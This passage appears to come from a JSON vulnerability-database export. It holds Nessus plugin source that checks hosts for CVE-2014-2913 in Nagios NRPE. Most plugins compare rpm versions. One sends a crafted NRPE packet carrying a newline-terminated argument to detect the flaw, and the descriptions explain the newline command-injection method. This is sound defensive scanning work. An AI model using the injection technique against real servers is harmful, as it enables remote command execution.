2014-5896.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79793);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:19 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"FEDORA\", value:\"2014-5896\");\n\n script_name(english:\"Fedora 19 : nrpe-2.15-2.fc19 (2014-5896)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089878\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145738.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74f449ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"nrpe-2.15-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:25:05", "bulletinFamily": "scanner", "description": "Use %configure macro as it deals with config.sub/guess and various flags properly ---- nrpe-2.15-6.el7 - Fix spec file for missing /usr/share/libtool/config/config.guess nrpe-2.15-6.el6 - Fix spec file for missing /usr/share/libtool/config/config.guess nrpe-2.15-6.fc23 - Fix spec file for missing /usr/share/libtool/config/config.guess nrpe-2.15-6.fc22 - Fix spec file for missing /usr/share/libtool/config/config.guess nrpe-2.15-6.fc21 - Fix spec file for missing /usr/share/libtool/config/config.guess\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-15398.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=86042", "published": "2015-09-21T00:00:00", "title": "Fedora 23 : nrpe-2.15-7.fc23 (2015-15398)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-15398.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86042);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:57:26 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_xref(name:\"FEDORA\", value:\"2015-15398\");\n\n script_name(english:\"Fedora 23 : nrpe-2.15-7.fc23 (2015-15398)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use %configure macro as it deals with config.sub/guess and various\nflags properly ---- nrpe-2.15-6.el7 - Fix spec file for missing\n/usr/share/libtool/config/config.guess nrpe-2.15-6.el6 - Fix spec file\nfor missing /usr/share/libtool/config/config.guess nrpe-2.15-6.fc23 -\nFix spec file for missing /usr/share/libtool/config/config.guess\nnrpe-2.15-6.fc22 - Fix spec file for missing\n/usr/share/libtool/config/config.guess nrpe-2.15-6.fc21 - Fix spec\nfile for missing /usr/share/libtool/config/config.guess\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1239738\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166528.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1d81b43\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"nrpe-2.15-7.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:21:12", "bulletinFamily": "scanner", "description": "nagios-nrpe has been updated to prevent possible remote command execution when command arguments are enabled. This issue affects versions 2.15 and older.\n\nFurther information is available at http://seclists.org/fulldisclosure/2014/Apr/240\n\nThese security issues have been fixed :\n\n - Remote command execution (CVE-2014-2913)", "modified": "2014-05-21T00:00:00", "id": "SUSE_11_NAGIOS-NRPE-140507.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74117", "published": "2014-05-21T00:00:00", "title": "SuSE 11.3 Security Update : nagios-nrpe, nagios-nrpe-debuginfo, nagios-nrpe-debugsource, etc (SAT Patch Number 9204)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74117);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/05/21 10:44:53 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n\n script_name(english:\"SuSE 11.3 Security Update : nagios-nrpe, nagios-nrpe-debuginfo, nagios-nrpe-debugsource, etc (SAT Patch Number 9204)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"nagios-nrpe has been updated to prevent possible remote command\nexecution when command arguments are enabled. This issue affects\nversions 2.15 and older.\n\nFurther information is available at\nhttp://seclists.org/fulldisclosure/2014/Apr/240\n\nThese security issues have been fixed :\n\n - Remote command execution (CVE-2014-2913)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=874743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-2913.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9204.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-nrpe-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-plugins-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"nagios-nrpe-2.12-24.4.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"nagios-nrpe-doc-2.12-24.4.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"nagios-plugins-nrpe-2.12-24.4.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:31", "bulletinFamily": "scanner", "description": "** DISPUTED ** Incomplete blacklist vulnerability in nrpe.c in Nagios Remote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers to execute arbitrary commands via a newline character in the -a option to libexec/check_nrpe. NOTE: this issue is disputed by multiple parties. It has been reported that the vendor allows newlines as 'expected behavior.' Also, this issue can only occur when the administrator enables the 'dont_blame_nrpe' option in nrpe.conf despite the 'HIGH security risk' warning within the comments.", "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2014-364.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78307", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : nrpe (ALAS-2014-364)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-364.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78307);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_xref(name:\"ALAS\", value:\"2014-364\");\n\n script_name(english:\"Amazon Linux AMI : nrpe (ALAS-2014-364)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"** DISPUTED ** Incomplete blacklist vulnerability in nrpe.c in Nagios\nRemote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers\nto execute arbitrary commands via a newline character in the -a option\nto libexec/check_nrpe. NOTE: this issue is disputed by multiple\nparties. It has been reported that the vendor allows newlines as\n'expected behavior.' Also, this issue can only occur when the\nadministrator enables the 'dont_blame_nrpe' option in nrpe.conf\ndespite the 'HIGH security risk' warning within the comments.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-364.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update nrpe' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nagios-plugins-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nrpe-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"nagios-plugins-nrpe-2.15-2.7.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nrpe-2.15-2.7.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nrpe-debuginfo-2.15-2.7.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nagios-plugins-nrpe / nrpe / nrpe-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:21:06", "bulletinFamily": "scanner", "description": "The version of Nagios Remote Plugin Executor (NRPE) running on the remote host has command argument processing enabled and accepts the newline character. An unauthenticated, remote attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application by appending those commands via a newline character in the '-a' option to libexec/check_nrpe.", "modified": "2018-11-15T00:00:00", "id": "NAGIOS_NRPE_COMMAND_ARGUMENT_PROCESSING.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73757", "published": "2014-04-29T00:00:00", "title": "Nagios NRPE Command Argument Processing Enabled", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73757);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"EDB-ID\", value:\"32925\");\n script_xref(name:\"EDB-ID\", value:\"34461\");\n\n script_name(english:\"Nagios NRPE Command Argument Processing Enabled\");\n script_summary(english:\"Checks if the remote Nagios NRPE server allows command argument processing containing newline.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The monitoring service running on the remote host may be affected by\nan arbitrary command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Nagios Remote Plugin Executor (NRPE) running on the\nremote host has command argument processing enabled and accepts the\nnewline character. An unauthenticated, remote attacker can exploit\nthis issue to execute arbitrary commands within the context of the\nvulnerable application by appending those commands via a newline\ncharacter in the '-a' option to libexec/check_nrpe.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://legalhackers.com/advisories/nagios-nrpe.txt\");\n # https://packetstormsecurity.com/files/126211/Nagios-Remote-Plugin-Executor-2.15-Remote-Command-Execution.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?addc2ef6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable command argument processing in the NRPE configuration.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nagios:nagios\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"nagios_nrpe_detect.nasl\");\n script_require_ports(\"Services/nrpe\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\n# ssh1_func.inc is required for crc32tab[] look up table below\ninclude(\"ssh1_func.inc\");\n\nfunction calculate_crc32(data)\n{\n local_var crc, i, len;\n len = strlen(data);\n crc = 0xFFFFFFFF;\n for (i=0; i<len; i++)\n crc = ((crc >>> 8) & 0x00FFFFFF) ^ crc32tab[(crc ^ ord(data[i])) & 0xFF];\n return crc ^ 0xFFFFFFFF;\n}\n\nport = get_service(svc:\"nrpe\", exit_on_fail:TRUE);\n\nappname = \"Nagios NRPE\";\n\nversion = get_kb_item_or_exit(\"nrpe/\" + port + \"/Version\");\n\ns = open_sock_tcp(port);\nif (!s) audit(AUDIT_SOCK_FAIL, port,'TCP');\n\nset_byte_order(BYTE_ORDER_BIG_ENDIAN);\n\npacket_version = '\\x00\\x02';\npacket_type = '\\x00\\x01';\ncrc = '\\x00\\x00\\x00\\x00';\nresult_code = mkbyte(rand() % 255) + mkbyte(rand() % 255);\ncmd = '_NRPE_CHECK!nessus';\nbuffer = '\\x0a';\n\nbuffer += crap(data:'\\x00', length: (1024 - strlen(cmd) - 1));\n\nrandom_buffer = mkbyte(rand() % 255) + mkbyte(rand() % 255);\n\npkt = packet_version + packet_type + crc + result_code + cmd + buffer + random_buffer;\n\ncrc = uint(calculate_crc32(data:pkt));\ncrc =\n mkbyte(crc >> 24) +\n mkbyte(crc >> 16) +\n mkbyte(crc >> 8) +\n mkbyte(crc >> 0);\n\npkt = packet_version + packet_type + crc + result_code + cmd + buffer + random_buffer;\n\nsend(socket:s, data:pkt);\n\nres = recv(socket:s, length:10, min:10);\n\n# when command argument processing is disabled, the server will not respond at all\nif (strlen(res) == 0)\n{\n close(s);\n audit(AUDIT_LISTEN_NOT_VULN, appname, port, version);\n}\n\nif (strlen(res) != 10)\n{\n close(s);\n exit(0, 'Unexpected response size for service on port ' + port + '.');\n}\n\nrecv_version = substr(res, 0, 1);\nrecv_pkt_type = substr(res, 2, 3);\nrecv_crc = substr(res, 4, 7);\nrecv_result_code = substr(res, 8, 9);\n\nif (recv_version != '\\x00\\x02')\n{\n close(s);\n exit(0, 'Unrecognized protocol version for service on port ' + port + '.');\n}\n\nif (recv_pkt_type != '\\x00\\x02')\n{\n close(s);\n exit(0, 'Unrecognized packet type for server on port ' + port + '.');\n}\n\ndata = recv(socket:s, length:1024, min:1024);\nif (strlen(data) == 0)\n{\n close(s);\n audit(AUDIT_RESP_NOT, port);\n}\n\nif (\"NRPE\" >!< data) audit(AUDIT_NOT_DETECT, appname, port);\n\nif (strlen(data) != 1024)\n{\n close(s);\n exit(0, 'Unexpected response size for service on port ' + port + '.');\n}\n\nrand_bytes = recv(socket:s, length:2, min:2);\n\nclose(s);\n\nif (strlen(rand_bytes) == 0) audit(AUDIT_RESP_NOT, port);\n\nif (strlen(rand_bytes) != 2)\n exit(0, 'Unexpected response size for service on port ' + port + '.');\n\nrecv_pkt = recv_version + recv_pkt_type + '\\x00\\x00\\x00\\x00' +\n recv_result_code + data + rand_bytes;\n\ncalculated_crc = uint(calculate_crc32(data:recv_pkt));\ncalculated_crc =\n mkbyte(calculated_crc >> 24) +\n mkbyte(calculated_crc >> 16) +\n mkbyte(calculated_crc >> 8) +\n mkbyte(calculated_crc >> 0);\n\nif (recv_crc != calculated_crc)\n exit(0, 'CRC check failed for service on port ' + port + '.');\n\n# if we get a proper response, we are vuln\nsecurity_report_v4(\n port:port,\n severity:SECURITY_HOLE,\n extra:report_items_str(report_items:make_array(\n \"Version\", version,\n \"NRPE command argument processing\", \"Enabled\"\n ))\n);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:21:37", "bulletinFamily": "scanner", "description": "This nrpe update fixes the following security documentation problem.\n\n - bnc#874743: Documented a possible command injection when command arguments are enabled (CVE-2014-2913). More details can be found inside the documentation of this package.", "modified": "2018-11-10T00:00:00", "id": "OPENSUSE-2014-335.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75345", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : nrpe (openSUSE-SU-2014:0594-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-335.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75345);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2014-2913\");\n\n script_name(english:\"openSUSE Security Update : nrpe (openSUSE-SU-2014:0594-1)\");\n script_summary(english:\"Check for the openSUSE-2014-335 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This nrpe update fixes the following security documentation problem.\n\n - bnc#874743: Documented a possible command injection when\n command arguments are enabled (CVE-2014-2913). More\n details can be found inside the documentation of this\n package.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=874743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-05/msg00005.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nagios-plugins-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nagios-plugins-nrpe-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nrpe-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nrpe-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 